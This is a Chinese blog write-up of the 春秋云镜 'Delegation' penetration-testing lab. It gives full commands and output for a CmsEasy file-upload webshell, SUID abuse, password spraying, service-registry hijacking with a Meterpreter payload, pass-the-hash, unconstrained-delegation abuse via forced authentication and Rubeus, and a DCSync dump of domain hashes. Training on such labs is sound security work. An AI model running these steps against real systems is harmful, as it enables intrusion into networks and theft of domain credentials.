fffffilm's learning

春秋云镜-Delegation

该文章更新于 2025.03.01
  1. 春秋云镜-Delegation
    1. flag01
      1. webshell
      2. root
    2. flag02
      1. 内网收集
      2. system
    3. flag03
    4. flag04

渗透

春秋云镜-Delegation

flag01

webshell

1
2
3
4
5
6
7
8
start infoscan
39.98.121.30:21 open
39.98.121.30:22 open
39.98.121.30:3306 open
39.98.121.30:80 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.98.121.30       code:200 len:68104  title:中文网页标题39.98.121.30

开放了四个端口,80是一个CmsEasy

image-20250227175009235

查看源代码发现版本:CmsEasy 7_7_5_20210919

/admin 使用弱口令admin/123456登录后台。在网上找到任意文件上传POC

这是yakit的模板

1
2
3
4
5
6
7
8
POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.98.121.30
Cookie: PHPSESSID=8j2ut1rkp5ai0t6sqif66s47sd; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 16

sid={{url(#data_d_.._d_.._d_.._d_1.php)}}&slen=693&scontent={{url(<?php eval($_POST['1']);phpinfo();?>)}}

执行后在web根目录生成1.php

root

1
find / -perm -u=s -type f 2>/dev/null

发现diff命令具体suid权限

image-20250227180032481

查一下diff文件的用法:diff | GTFOBins

find命令发现flag位置

1
diff --line-format=%L /dev/null /home/f*/f*

image-20250227180901072

flag01: flag{f32fec29-297c-43a5-a5b4-52ae00b09a16}

flag02

内网收集

flag01中提到了 WIN19\Adrian,很明显是一个域用户

我们先搭代理,然后扫一下内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
./fscan -h 172.22.4.36/24
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.7:88 open
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.4.7    (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.36        code:200 len:68100  title:中文网页标题
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server

简单归纳一下

172.22.4.7 DC域控

172.22.4.19 FILESERVER.xiaorang.lab

172.22.4.36 外网(已拿下

172.22.4.45 XIAORANG\WIN19

而且有提到rockyou,我们使用rockyou作为密码字典来对172.22.4.45进行密码喷洒

1
proxychains crackmapexec smb 172.22.4.45 -u 'Adrian' -p rockyou.txt -d WIN19

拿到密码babaygirl1,但是密码过期了

image-20250227182946566

system

我们直接rdp上去改密码

1
proxychains4 rdesktop 172.22.4.45 -u 'Adrian' -p 'babygirl1' -z -r disk:share=/root/tmp

登录上去之后发现桌面有个东西

image-20250227183301370

文件夹里面有个html,打开发现是份安全报告。点开发现里面有两个high的风险。

这里提到了当前用户可以修改这个注册表。

image-20250227183552213

那我们把这个目标exe改成木马不就直接拿到system了吗?

生成一个C2马

image-20250227190800339

在cmd运行

修改注册表

1
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\testx64.exe" /f

查看是否成功

1
reg query "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath

启动服务

1
sc start gupdate

但是CS的马一直连不上,后来换成msf成功

先生成木马

1
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe > aaa.exe

启动msf

1
2
3
4
5
6
proxychains msfconsole
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 4444
exploit

但是session的存活时间很短,需要迁移一下进程(选system权限的进程迁移

1
migrate 5676

image-20250228151532596

1
cat /users/administrator/flag/flag02.txt

image-20250228151353236

flag02: flag{2e435492-d4d1-492f-b066-7ca7679f36f3}

flag03

把哈希dump下来

1
2
3
4
5
6
7
8
meterpreter > hashdump
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Adrian:1003:aad3b435b51404eeaad3b435b51404ee:bd0f21ed526a885b378895679a412387:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:44d8d68ed7968b02da0ebddafd2dd43e:::

但是没什么用

加一个管理员账号,方便rdp(msf的shell进不去,打一个pth来加用户

1
proxychains4 python psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

加账号

1
2
net user fffffilm Password@973 /add
net localgroup administrators fffffilm /add

image-20250228163617503

然后再抓一下哈希

1
2
meterpreter > load kiwi
meterpreter > creds_all

image-20250228162526978

1
2
3
4
Username  Domain    NTLM                              SHA1
--------  ------    ----                              ----
Adrian    WIN19     bd0f21ed526a885b378895679a412387  aec0482541df707c56267fbdb5ee39b622b593da
WIN19$    XIAORANG  5943c35371c96f19bda7b8e67d041727  5a4dc280e89974fdec8cf1b2b76399d26f39b8f8

用bloodhood进行信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kali)-[~/Desktop/tools/BloodHound-python]
└─# proxychains python3 bloodhound.py -u "WIN19$" --hashes f013947fa647df6403a4653648059060:f013947fa647df6403a4653648059060 -d xiaorang.lab -dc DC01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: DC01.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 5 computers
INFO: Connecting to LDAP server: DC01.xiaorang.lab
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: WIN19.xiaorang.lab
INFO: Querying computer: FILESERVER.xiaorang.lab
INFO: Querying computer: DC01.xiaorang.lab
INFO: Done in 00M 25S
INFO: Compressing output into 20250228175948_bloodhound.zip

分析发现win19和dc都有非约束性委派权限(域控是默认配置了的

image-20250228191536156

所以可以利用非约束性委派,只要域控访问了win19,就可以获取TGT,然后导入票据,最后dump哈希

用刚刚加的管理员rdp上去

1
proxychains4 rdesktop 172.22.4.45 -u 'fffffilm' -p 'Password@973'  -r disk:share=/root/tmp

先监听(需要管理员运行

1
.\Rubeus.exe monitor /interval:1 /filteruser:dc01$

然后进行强制认证奇安信攻防社区-红队域渗透NTLM Relay:强制认证方式总结

1
proxychains4 python dfscoerce.py -u "WIN19$" -hashes :5943c35371c96f19bda7b8e67d041727 -d xiaorang.lab WIN19 172.22.4.7

image-20250228180742321

image-20250228180734468

拿到TGT后导入TGT票据

1
.\Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD5kqHiyeguCbUjWyXJxzwONdCB5iDsgmpTWOIxHgHHmb4WIrIXkiT6/wp8IC9d7IFI2Q+Ol8aE7dXNPFc3NgFCznxPFDUpF7Tz/ILtcVg5h1f/ShYgTjhZ4RINrJXU2sCELveNASbDnqixuOPajRclKCdCYwlv03LjH3JwlFYKD3UlxxBn6eRwewzuHzQRlaCrh9HoM4rqaT3xj5/xz2tCpLK6oEf6OFa22+67pQjrvZ9ZPgnE2Vq+DzyYkDn8Ufg190rNnfjGFJq1AtgjB3DgQItqLRP17RpGuOtJdrWhFeBhVyZH/4ANqH8nv+5jgbZWoPXqVMlMM2dNE1zQjymIDuNPNj051IdpyCD1NcMkDIKoPYXLpwZy3Ktwo1ZlKHJdlOg2WS+WgcwbzIUMxSLCXOAOxRLIq91vw7+trJJ4p+nlCspUhBFLJ3a0BFKF5+KEJqAFsn++j9NhSzsLgaK2it2v51AaE+SbRtrAND2RxDH/3mFHpa582nqUrpmCOPWrpgj7gkMeqnBPPRU2ki9y0cQPfS8DUaueQdokVZjZmlhwLs+iKtdWamykRBstI0APqjSLuUzV993iPhZhw+V4W/KkPmIQuXDX8+sRcVwX5xisIPAerRjBSJZHE41+wYMvpl/KtukbjRwSPnMQgeH1LsY5DlLx1LjgwukEKU2wBwQcAR13GAoARr3+iUfJywg+oxaiFd512HR6J4R91VL8gL9SJ50zP5D9UXgWDlU7dnLZVgsU/mlR2eBPpvpYcAhL+TgBJuArlJ9K3FVrf3hAOZV2wX0NzG2Q2hl6hoovUEwgz5+srGRAv+fnesXUGjhD9+h4CwijC/BgBBNw+1DdSNNnMjxFFA2lHEd9tmsa1hhvCvoNlC6tk5PPWEAhVCfwZDpy8HKKZA9A2bdo1OaoKHN9ejBrGgs7J87eW42iIJ8Hh1cbEXmCA2/WX8Lv6ZQ/Zl6kZXipntdhGNqT9yFiP6RLWcciQvyMwkfZFwCSv+H4pj/ACCL/ABoeBhBSCKfbSYUsSJqVRHYQAphb9cN4D8ZrIrF8pJIgcNQWmewYrQk2mqvYtoxtfz24TzckKVDmgdXSRHgoht3I9oJKNfdXV4juIR16VPc3JY4LqadBTTBO/egt+1oRamBi55ndLUV+0XBOS5hHkxyAfG1ItmrfB2EeRgFlpSOiPCdKyrikbeBXlQDAcK7xOrLZSUAeNjzet9BqVthKVovMpUCfReYcOkTChz3uxCqlBBxosPXI8PoEPa7V+9Z7TNGnk3DVTq7/iQvZpLf3CJk4FFc88BD1IGM0rL9ek/WbAXTXZOYfGg5nuBYKOnW/xFHr6VOf+MZd5PJOqLNHVt/Iu2MAxMSoTBM6vu/W8zcyEq+kfdRqwemAUH+hLN4cBOy4JqXa+VIS+xIMikmw2sUTEmBdn2KAk1qf4hdNgwuaJShJFSWmjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCAuT2BlZ/N6dP9EejdLabb7WrlFnPLpXAk7VtCJ3j6ga6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDIyODA5NTUwMlqmERgPMjAyNTAyMjgxOTU1MDJapxEYDzIwMjUwMzA3MDk1NTAyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

image-20250228181140799

打开mimikatz然后用dcsync拿hash

1
lsadump::dcsync /all /csv

image-20250228181329876

最后打个pth拿flag

1
proxychains crackmapexec smb 172.22.4.19 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

image-20250228181502030

flag03: flag{608368ba-4efc-493b-914e-8e67eac324cb}

flag04

1
proxychains crackmapexec smb 172.22.4.7 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"

image-20250228181616512

flag04: flag{25d59671-4d7d-4b8c-8927-bca843c1a12c}

渗透